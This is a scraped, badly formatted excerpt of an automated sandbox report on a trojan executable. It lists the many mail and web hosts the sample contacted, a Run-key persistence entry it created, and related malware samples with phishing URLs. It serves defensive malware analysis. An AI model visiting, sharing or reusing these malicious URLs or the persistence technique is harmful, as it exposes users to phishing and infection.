                                                                                                                                                                                                                                                              http://www.jenco.co.uk/xfs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626019620.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628908863.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.632199741.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629010341.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.vexcom.com/Bfs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                              34.228.163.56
                                                                                                                                                                                                                                                              cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                              104.26.7.17
                                                                                                                                                                                                                                                              jabian.comUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              104.24.161.27
                                                                                                                                                                                                                                                              fundeo.comUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              217.69.139.150
                                                                                                                                                                                                                                                              mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                              47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                                                                                                              198.49.23.145
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                              67.21.93.229
                                                                                                                                                                                                                                                              num6.17986.netUnited States
                                                                                                                                                                                                                                                              46844ST-BGPUStrue
                                                                                                                                                                                                                                                              76.74.184.61
                                                                                                                                                                                                                                                              alexpope.bizCanada
                                                                                                                                                                                                                                                              13768COGECO-PEER1CAtrue
                                                                                                                                                                                                                                                              203.137.75.45
                                                                                                                                                                                                                                                              okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                              172.67.152.159
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              104.20.55.214
                                                                                                                                                                                                                                                              bible.orgUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              153.126.211.112
                                                                                                                                                                                                                                                              mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                              217.160.0.131
                                                                                                                                                                                                                                                              mackusick.deGermany
                                                                                                                                                                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                              3.130.204.160
                                                                                                                                                                                                                                                              hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                              18.66.192.87
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                              49.212.243.77
                                                                                                                                                                                                                                                              listel.co.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                              194.143.194.23
                                                                                                                                                                                                                                                              reproar.comSpain
                                                                                                                                                                                                                                                              8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                                                                                                              5.189.171.125
                                                                                                                                                                                                                                                              muhr-soehne.deGermany
                                                                                                                                                                                                                                                              51167CONTABODEtrue
                                                                                                                                                                                                                                                              83.223.113.46
                                                                                                                                                                                                                                                              dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                              29017GYRONGBtrue
                                                                                                                                                                                                                                                              91.229.22.126
                                                                                                                                                                                                                                                              pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                              198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                              5.39.75.157
                                                                                                                                                                                                                                                              bosado.comFrance
                                                                                                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                                                                                                              172.67.165.62
                                                                                                                                                                                                                                                              www.snugpak.comUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              34.197.121.219
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                              13.248.169.48
                                                                                                                                                                                                                                                              www.findbc.comUnited States
                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                                                                              85.128.196.22
                                                                                                                                                                                                                                                              strazynski.plPoland
                                                                                                                                                                                                                                                              15967NAZWAPLtrue
                                                                                                                                                                                                                                                              173.194.202.27
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              202.254.236.40
                                                                                                                                                                                                                                                              www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                              173.194.202.26
                                                                                                                                                                                                                                                              alt4.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              81.2.194.241
                                                                                                                                                                                                                                                              www.edimart.huCzech Republic
                                                                                                                                                                                                                                                              24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                              217.19.254.22
                                                                                                                                                                                                                                                              shanks.co.ukUnited Kingdom
                                                                                                                                                                                                                                                              60819SAFENAMES-ASGBtrue
                                                                                                                                                                                                                                                              35.186.238.101
                                                                                                                                                                                                                                                              onzcda.comUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              216.177.137.32
                                                                                                                                                                                                                                                              fortknox.bmUnited States
                                                                                                                                                                                                                                                              3955321P-WSSUStrue
                                                                                                                                                                                                                                                              93.189.66.202
                                                                                                                                                                                                                                                              ssm.chSwitzerland
                                                                                                                                                                                                                                                              12347VIRTUALTECCHtrue
                                                                                                                                                                                                                                                              74.208.215.145
                                                                                                                                                                                                                                                              indonesiamedia.comUnited States
                                                                                                                                                                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                              18.66.192.94
                                                                                                                                                                                                                                                              d2kt7vovxa5e81.cloudfront.netUnited States
                                                                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                              54.36.175.146
                                                                                                                                                                                                                                                              biurohera.plFrance
                                                                                                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                                                                                                              46.30.60.158
                                                                                                                                                                                                                                                              ncn.deGermany
                                                                                                                                                                                                                                                              15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEtrue
                                                                                                                                                                                                                                                              104.21.23.9
                                                                                                                                                                                                                                                              www.jenco.co.ukUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              78.46.224.133
                                                                                                                                                                                                                                                              amic.atGermany
                                                                                                                                                                                                                                                              24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                              192.99.226.184
                                                                                                                                                                                                                                                              s5w.comCanada
                                                                                                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                                                                                                              49.212.180.178
                                                                                                                                                                                                                                                              kumaden.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                              195.78.66.50
                                                                                                                                                                                                                                                              www.photo4b.comPoland
                                                                                                                                                                                                                                                              41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                                                                                                              137.118.26.67
                                                                                                                                                                                                                                                              fnw.usUnited States
                                                                                                                                                                                                                                                              6250NEONOVA-NETUSfalse
                                                                                                                                                                                                                                                              192.124.249.9
                                                                                                                                                                                                                                                              fdlymca.orgUnited States
                                                                                                                                                                                                                                                              30148SUCURI-SECUStrue
                                                                                                                                                                                                                                                              188.166.152.188
                                                                                                                                                                                                                                                              www.c9dd.comNetherlands
                                                                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                              185.230.63.171
                                                                                                                                                                                                                                                              sokuwan.netIsrael
                                                                                                                                                                                                                                                              58182WIX_COMILtrue
                                                                                                                                                                                                                                                              185.253.212.22
                                                                                                                                                                                                                                                              karmy.com.plPoland
                                                                                                                                                                                                                                                              48707GREENER-ASPLtrue
                                                                                                                                                                                                                                                              210.140.73.39
                                                                                                                                                                                                                                                              at-shun.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                              70.39.251.249
                                                                                                                                                                                                                                                              quadlock.comUnited States
                                                                                                                                                                                                                                                              54641INMOTI-1USfalse
                                                                                                                                                                                                                                                              104.26.7.221
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              62.75.216.137
                                                                                                                                                                                                                                                              www.tyrns.comGermany
                                                                                                                                                                                                                                                              8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                                                                                              62.122.170.171
                                                                                                                                                                                                                                                              shztm.ruCzech Republic
                                                                                                                                                                                                                                                              50245SERVEREL-ASNLtrue
                                                                                                                                                                                                                                                              99.84.88.4
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                              213.142.131.159
                                                                                                                                                                                                                                                              pcoyuncu.comTurkey
                                                                                                                                                                                                                                                              397563ADEOXTECHUStrue
                                                                                                                                                                                                                                                              203.0.113.0
                                                                                                                                                                                                                                                              nme.co.jpReserved
                                                                                                                                                                                                                                                              136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUtrue
                                                                                                                                                                                                                                                              51.159.3.117
                                                                                                                                                                                                                                                              ossir.orgFrance
                                                                                                                                                                                                                                                              12876OnlineSASFRtrue
                                                                                                                                                                                                                                                              82.201.61.230
                                                                                                                                                                                                                                                              www.nelipak.nlNetherlands
                                                                                                                                                                                                                                                              15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                                                                                                              79.124.76.247
                                                                                                                                                                                                                                                              mkm-gr.comBulgaria
                                                                                                                                                                                                                                                              31083TELEPOINTBGtrue
                                                                                                                                                                                                                                                              192.124.249.3
                                                                                                                                                                                                                                                              pers.comUnited States
                                                                                                                                                                                                                                                              30148SUCURI-SECUStrue
                                                                                                                                                                                                                                                              34.102.136.180
                                                                                                                                                                                                                                                              hamaker.netUnited States
                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                              52.71.57.184
                                                                                                                                                                                                                                                              hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                              61.200.81.23
                                                                                                                                                                                                                                                              yasuma.comJapan2914NTT-COMMUNICATIONS-2914UStrue
                                                                                                                                                                                                                                                              192.241.158.94
                                                                                                                                                                                                                                                              nunomira.comUnited States
                                                                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                              172.67.164.178
                                                                                                                                                                                                                                                              clinicasanluis.com.coUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              63.251.106.25
                                                                                                                                                                                                                                                              kewlmail.comUnited States
                                                                                                                                                                                                                                                              29791VOXEL-DOT-NETUStrue
                                                                                                                                                                                                                                                              195.96.252.188
                                                                                                                                                                                                                                                              nlcv.bas.bgBulgaria
                                                                                                                                                                                                                                                              8745AS-BG-BASBGtrue
                                                                                                                                                                                                                                                              85.233.160.146
                                                                                                                                                                                                                                                              hbfuels.comUnited Kingdom
                                                                                                                                                                                                                                                              8622ISIONUKNamescoLimitedGBtrue
                                                                                                                                                                                                                                                              104.21.79.166
                                                                                                                                                                                                                                                              simetar.comUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              165.227.252.190
                                                                                                                                                                                                                                                              crcsi.orgUnited States
                                                                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                              185.151.30.147
                                                                                                                                                                                                                                                              pertex.comUnited Kingdom
                                                                                                                                                                                                                                                              48254TWENTYIGBtrue
                                                                                                                                                                                                                                                              199.34.228.78
                                                                                                                                                                                                                                                              ftmobile.comUnited States
                                                                                                                                                                                                                                                              27647WEEBLYUStrue
                                                                                                                                                                                                                                                              208.80.123.104
                                                                                                                                                                                                                                                              gbp-jp.comUnited States
                                                                                                                                                                                                                                                              16552TIGGEEUStrue
                                                                                                                                                                                                                                                              103.168.172.217
                                                                                                                                                                                                                                                              in1.smtp.messagingengine.comunknown
                                                                                                                                                                                                                                                              7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                              198.185.159.145
                                                                                                                                                                                                                                                              mijash3.comUnited States
                                                                                                                                                                                                                                                              53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                              198.185.159.144
                                                                                                                                                                                                                                                              captlfix.comUnited States
                                                                                                                                                                                                                                                              53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                              85.159.66.62
                                                                                                                                                                                                                                                              amele.comTurkey
                                                                                                                                                                                                                                                              34619CIZGITRtrue
                                                                                                                                                                                                                                                              211.13.196.162
                                                                                                                                                                                                                                                              unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                                                                                                              103.168.172.221
                                                                                                                                                                                                                                                              unknownunknown
                                                                                                                                                                                                                                                              7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                              35.172.94.1
                                                                                                                                                                                                                                                              themark.orgUnited States
                                                                                                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                              76.223.35.103
                                                                                                                                                                                                                                                              nrsi.comUnited States
                                                                                                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                                                                                                              92.204.129.113
                                                                                                                                                                                                                                                              lpver.comGermany
                                                                                                                                                                                                                                                              398108GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                              159.89.244.183
                                                                                                                                                                                                                                                              tcpoa.comUnited States
                                                                                                                                                                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                                                                              69.163.239.62
                                                                                                                                                                                                                                                              sjbs.orgUnited States
                                                                                                                                                                                                                                                              26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                              104.26.3.124
                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              66.94.119.160
                                                                                                                                                                                                                                                              www.yocinc.orgUnited States
                                                                                                                                                                                                                                                              394513AWESOMENET-CORPUSfalse
                                                                                                                                                                                                                                                              204.11.56.48
                                                                                                                                                                                                                                                              impexnc.comVirgin Islands (BRITISH)
                                                                                                                                                                                                                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                                                                                              154.203.14.100
                                                                                                                                                                                                                                                              www.mobilnic.netSeychelles
                                                                                                                                                                                                                                                              135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                                                                                                                                                                                                              108.167.164.216
                                                                                                                                                                                                                                                              aevga.comUnited States
                                                                                                                                                                                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                                              5.196.166.214
                                                                                                                                                                                                                                                              www.spanesi.comFrance
                                                                                                                                                                                                                                                              16276OVHFRfalse
                                                                                                                                                                                                                                                              185.76.64.25
                                                                                                                                                                                                                                                              kallman.netSweden
                                                                                                                                                                                                                                                              200719MISSDOMAINSEtrue
                                                                                                                                                                                                                                                              47.91.167.60
                                                                                                                                                                                                                                                              popbook.comUnited States
                                                                                                                                                                                                                                                              45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                                                                                              64.125.133.18
                                                                                                                                                                                                                                                              reglera.comUnited States
                                                                                                                                                                                                                                                              393631DLSS-CA-EMERYVILLE-ASUSfalse
                                                                                                                                                                                                                                                              213.186.33.16
                                                                                                                                                                                                                                                              doggybag.orgFrance
                                                                                                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                                                                                                              213.186.33.17
                                                                                                                                                                                                                                                              unknownFrance
                                                                                                                                                                                                                                                              16276OVHFRfalse
                                                                                                                                                                                                                                                              104.21.8.75
                                                                                                                                                                                                                                                              siongann.comUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                              93.187.206.66
                                                                                                                                                                                                                                                              www.yoruksut.comTurkey
                                                                                                                                                                                                                                                              43391NETDIREKT-ASTRtrue
                                                                                                                                                                                                                                                              87.230.93.218
                                                                                                                                                                                                                                                              dwid.deGermany
                                                                                                                                                                                                                                                              8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                                                              82.208.6.9
                                                                                                                                                                                                                                                              insia.comCzech Republic
                                                                                                                                                                                                                                                              15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                                                                                                              104.26.15.53
                                                                                                                                                                                                                                                              www.elpro.siUnited States
                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                              157.112.176.4
                                                                                                                                                                                                                                                              www.11tochi.netJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                                                                                              Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                                                                                                                              Analysis ID:879119
                                                                                                                                                                                                                                                              Start date and time:2023-05-31 14:48:48 +02:00
                                                                                                                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                              Overall analysis duration:0h 14m 54s
                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                              • HDC enabled
                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                              Sample file name:fs7AQcREFX.exe
                                                                                                                                                                                                                                                              Original Sample Name:6bb40ed95f770955ea7cf27e4785612e.exe
                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                              Classification:mal100.spre.troj.evad.winEXE@19/4@1964/100
                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                                              HDC Information:
                                                                                                                                                                                                                                                              • Successful, ratio: 62.6% (good quality ratio 60.6%)
                                                                                                                                                                                                                                                              • Quality average: 81.3%
                                                                                                                                                                                                                                                              • Quality standard deviation: 27.6%
                                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                                              • Number of executed functions: 104
                                                                                                                                                                                                                                                              • Number of non-executed functions: 298
                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, a-0010.a-msedge.net
                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                              • VT rate limit hit for: fs7AQcREFX.exe
                                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                                              14:49:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                              14:50:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                              14:50:48API Interceptor2x Sleep call for process: fs7AQcREFX.exe modified
                                                                                                                                                                                                                                                              14:51:05API Interceptor4x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              34.228.163.56LV-700317.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                              • www.bigmamasfood.com/bb27/?6lgXi2XP=LLqE50UICs27rzyCSnXoAxkAjQNeQX4++4zP0SPmyAW4Ic4sQmOk57jABVfQJzBxcoJk&0lThl=L2J81DZP9D-X0V
                                                                                                                                                                                                                                                              104.26.7.176gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                  d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                    MYorfmVq9Z.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                      z2xQEFs54b.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        990109.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          https://nenalandia-tv.blogspot.com/2012/09/alejandra-alloza-28092012.html?rndad=1476455992-1578670554Get hashmaliciousAudio PhisherBrowse
                                                                                                                                                                                                                                                                            ze99HWZnJK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              104.24.161.27rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                jByRaPZ2js.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  A5VY5aB4rk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    z2xQEFs54b.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                      kvdYhqN3Nh.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        holp-ai.com6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        lCVLEXbxih.exeGet hashmaliciousPushdo, DCRat, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        h9Gwq0fYVO.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        foNMlXr86C.exeGet hashmaliciousPushdo, SmokeLoader, SystemBCBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        nwk9iV8lpS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        3ts2As2Bkm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        ZBfaaLcshZ.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        jByRaPZ2js.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        TLURH6Og6c.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                                                        • 59.106.13.169
                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                        AMAZON-AESUShttps://1drv.ms/b/s!AkXfquEP1S_WchXVqGYpLRP0q04Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 52.5.13.197
                                                                                                                                                                                                                                                                                        https://bookme.name/carolcommuni/pdf-documentation-reviewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 44.211.195.229
                                                                                                                                                                                                                                                                                        https://www.bing.com/ck/a?!&&p=c06ae40dcc410344JmltdHM9MTY4NTMxODQwMCZpZ3VpZD0xNTQ1NWMwOS1iMjE5LTYwZTEtM2RhMi00ZWNiYjNkOTYxOTEmaW5zaWQ9NTE4NA&ptn=3&hsh=3&fclid=15455c09-b219-60e1-3da2-4ecbb3d96191&u=a1aHR0cHM6Ly93d3cuYW1jaGFtLmdlL2FyY2hpdmUucGhw#info@balidea.com&ntb=1Get hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                        • 34.193.113.164
                                                                                                                                                                                                                                                                                        https://bafkreibuogfvo5akbbivqo6hsznxbrxdvibhrcs6xwaiabrdtv5ij7l3yq.ipfs.infura-ipfs.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                        • 52.2.229.63
                                                                                                                                                                                                                                                                                        https://d9c01edc-81e7-450f-a564-043294d846a1.id.repl.co/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 3.233.152.239
                                                                                                                                                                                                                                                                                        https://bancolombia--com-mobileapp.repl.co/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        • 3.233.152.248
                                                                                                                                                                                                                                                                                        https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https://eccenter.com.br/podldo/NaVhUXbTGgdAktotGnItErBubGHydgSTBmLfipghRfbvwRxYfb/Y3N3YWl0c0BwZWxsYS5jb20=Get hashmaliciousUnknownBrowse
